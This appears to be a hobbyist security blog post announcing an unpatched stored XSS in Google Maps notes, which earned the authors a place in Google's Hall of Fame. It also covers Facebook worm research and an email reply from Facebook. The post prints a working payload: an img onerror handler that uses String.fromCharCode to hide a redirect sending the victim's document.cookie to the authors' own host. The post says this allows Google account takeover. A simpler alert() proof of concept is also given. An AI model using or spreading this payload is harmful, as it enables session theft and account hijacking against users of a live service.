Unfixed Google hack
Hi there folks, we are happy to tell you that Fredrik, Mathias and me; Jelmer are all in the Google security Hall of Fame for our findings.
The latest unpublished XSS for which I got in the Hall of Fame is still unpatched.
Here is the PoC I sent Google:
http://maps.google.com/?z=4&pw=2
And insert this inside the notes:
<img src='unicorn.jpg' onerror='document.location=String.fromCharCode(104,116,116,112,58,47,47, 103,111,111,103,108,101,95,120,115,115,46,97,99,107,97,99,107,46,110,101, 116,47,99,111,111,107,105,101,101,101,101,101,101,101,115,46,112,104,112, 63,99,111,111,107,105,101,61)+document.cookie'>
The PoC we sent to Google is located here.
It will give us your cookie with which we can take over your Google account including things like gmail and youtube so beware!
For a simple PoC you probably just want to go to:
http://maps.google.com/?z=4&pw=2
And insert this in the notes:
<img src='unicorn.jpg' onerror='alert(/XSS by AckAck.net/)'>
For other things we published about Google you can check these previous blog posts:
How to use google as your proxy
Google dorks 2.0
Google adwords xsses
Googleapis xss
We had a message back from Facebook from my latest post in which I took on a Facebook worm. Here is the email conversation:
Hi Jelmer, Thanks for sending this in. Awesome blog post. Please do send in new findings via this same email if you wish. Thanks for contacting Facebook, Facebook -----Original Message to Facebook----- From: Jelmer 00 (jelmerdehen@hotmail.com) To: The Facebook Team Subject: RE: Report a Possible Security Vulnerability Hey, Did some research on a specific type of worm using Facebook at the moment. Here are the details with actions you could take: http://h.ackack.net/taking-down-facebook-worms.html Sincerely, -Jelmer de Hen -----End Original Message to Facebook-----
I also contacted infowar-monitor.net (the boys who took down Koobface) with my Facebook worm research to maybe cooperate and being able to legally take down the spammers but I had no respose.
If you want a great read about how they took down Koobface you can read their paper; it's a great read and can be found here (mirror)..
Anyway let's hope Google patches this gaping hole in their website soon.
Hello, I am Jelmer born in 1991 and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.